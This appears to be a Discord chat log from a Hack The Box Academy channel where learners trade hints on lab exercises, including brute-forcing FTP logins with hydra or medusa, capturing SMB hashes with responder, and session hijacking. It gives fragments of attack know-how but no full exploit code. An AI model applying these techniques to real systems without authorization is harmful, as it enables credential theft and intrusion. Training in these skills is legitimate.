No it's that email like I said though: #modules message these links will be more helpful

You are magnificent

This would be considered a spoiler

Can I DM?

ahhh so we arent trying to brute the SMB login here? We using a tool further down the in the section thats forbidden on the OSCP?

Ok so it says there is 1 existing in || DEV.DEPARTMENT.INT || but I see no way to list email ID's?

Well... If there's 1 wouldn't it make sense for it to be the first one?

IDs aren't some complex thing :D

I tried 1 and 2...

DM me what you got for fetching 1

wait it gave me something now...

odd

I'mma try on my own but something is funky with this 😛

got it

huh

I take it you hit the "nil" part

ye

now learning to read emails

I think I remember something

Take a look at the links I posted earlier

I rather stick to the section... there will be enough time for exploring on my own later with boxes and stuff.

unless the answer is not in the section?

It's not I checked and just posted an erratum because MANY people get stuck

And move to using an email client instead

I see... that's a big oof then

Yeah the fetch all command really doesn't do much for you

Guys whenever i try to ping the machines I cant seem to get a connection. But any Starting point machine i have no issue connecting to. I am using VIP+ aswell so not sure why nothing is working when i am paying 20 USD. Any help?

are you using your vip vpn config file to connect? because starting-point, regular, and academy vpns are all different

also please note that this would not be the place to ask about that, please refer to #rules and #welcome if you are confused about where to be (please note, if it hasn't been updated, that instead of ++verify it is now /verify)

I found the flag... adding 1 or 2 paragraphs to the section would have saved me 20m

or just providing the useful command in the imap commands part to begin with :D

I am using the Seasonal which automatically also connects the machine one. Whenever i spawn the target and try to ping it's IP address it doesn't ping it

seasonal is separate as well

or just change the FETCH command listing to || 1 fetch <id> <email_format>

but again this is NOT the place to ask

Do you recommend I use Pwnbox better?

refer to #welcome on how to verify your account to have access to more parts of the server

this channel is for discussing the modules found at https://academy.hackthebox.com

most emails are in the rfc822 format as that's the standard

ye still

how do use that command would help most folks

Cool if I dm ya @fathom pendant ?

sorry bouncing back and forth, but you should be able to enum the share with a Null session and use the R* tool to capture the hash

i don't recall needing to enum a user for that section but I'm also slowly updating notes and moving forward with other modules

https://tenor.com/view/epic-facepalm-gif-14650403

Ahhh gotcha sorry I'm dense

All good if you do get stuck go ahead and DM me just ping me here when you do I don't get blind DM pings

The Attacking Common Services module I would say is one of the ones you can mostly follow examples with a few tweaks

yeah I'm thinking my R* might not be working right because I've got it running but no inbound cnx

Just follow the steps directly

Can someone assit me in the Active Subdomain Enumeration module and finding the NS? I treid all the tools in the section but not getting it.

is it possible to speed up medusa for ftp cracking?

its taking hella long

like 5sec per one try 💀

and i have to crack user nd pw

on attacking common services ftp

now its like every 20sec

lol

I just use hydra with -t 48

But tbh hydra does something similar it basically doubles the time each time it spits out progress

it didn't work ://

you may need to reduce the threads then

how much?

I am redoing all of the enumeration, footprinting, and information gathering modules and taking notes on all of the exercises/skill assessments currently. As I am going through the Nmap module, I am wondering when you would use NSE in a situation outside of the module/the real world? Is it used throughout the exam?

"45 targets did not resolve" means you were sending packets out faster than it could take them

i tend to go in multiples of 16 when adjusting

so should i try like 32

if you want to use some scripts and output to an xmlfile >> and convert to html

or go even lower

32

can someone please help... this is for the session hijacking module.. not sure on what part im supposed to put the actual IP address in the index.php file for those. Can someone please share an example.
"Victim IP: {$_SERVER['REMOTE_ADDR']}

Wait a sec @naive field I think I know which section that is and if I'm correct, try first just connecting to that 2121 port and see what the banner tells you - that may speed up your results

bc you don't need to log on to see a banner, just connect

Gotta sign out via the start menu then log back in through your RDP client.

Anyone having issues with UDP services? I don't get any response from them.
You can test using the Footprint module, SNMP or IPMI sections
It works on pwnbox

nvm @naive field wrong module i was thinking sorry but the username and password are in those lists

okay gotchya, thanks

its still ongoing

i hope its not like in the last module i did

where for some reason i could not get the pw and user for no reason

I was able to get it with -t 16 with hydra, checking with 32 now

im on 32

been 20min by now

32 worked for me

dm me what command you're using if you're using hydra idk about medusa

bet

Has anyone finished the final session puzzling exercise? I managed to change the admin password, but now it's asking for a 2fa code and I'm stumped

question on the SMB section, sorry @fathom pendant but still stuck on this. Did you have to revert a few times to get it to work? Got a tool listening but not seeing anything coming in even with null session

give me one sec to look

rgr, appreciate it!! 😄

i believe all you have to do is make sure r* is running with the tun0 interface and on the remote machine call \\yourip\somesharename and it does something

it may also have something to do with rpc and creating shares

but I could absolutely be remembering this wrong and you just need to grab a couple things from the share and you're good

this one is fuzzy for me haven't come back and redone my notes in it

no; this isn't for that sort of thing this channel is for the Academy Modules found at http://academy.hackthebox.com

you can ask anyone else that's participating in it for help, but generally asking for outside help for active CTFs is disallowed

read #rules and #welcome

still not allowed

and still not the place for it

lol

if it's your hw then surely you should be able to complete it

Just point him in the right direction at least in stead of just saying this isn’t the place for it.

they just said

this is modules channel

for every request someone need to satisfy this channel is not gonna be what is intended for

🤷‍♂️

cause it is

Okay so where should he go then?

somewhere else

idk, he can ask in general or somewhere

if its ur homework u can prob find

the answer online for it

i saw these type of challenges a lot

u can find a similar one and reverse the encryption urself

research is the key

if u dont know how to do it :D

It’s not for me, it’s his but he asked for help and I sent him to this discord because usually people are helpful here. Thank you 🙂

Ask chatgpt, why are you asking in HTB modules section how to do your homework 😂

or this .

yeah I saw a thing in the share, but the thing you cant snag with the null session

😂 😂 Lol

yeah, chatgpt can prob solve tihs easly

yeah regoing over it now to help

this is why notes are important I'll Dm you what I did it has nothing to do with responder, sorry for leading you down a bad path @fallow delta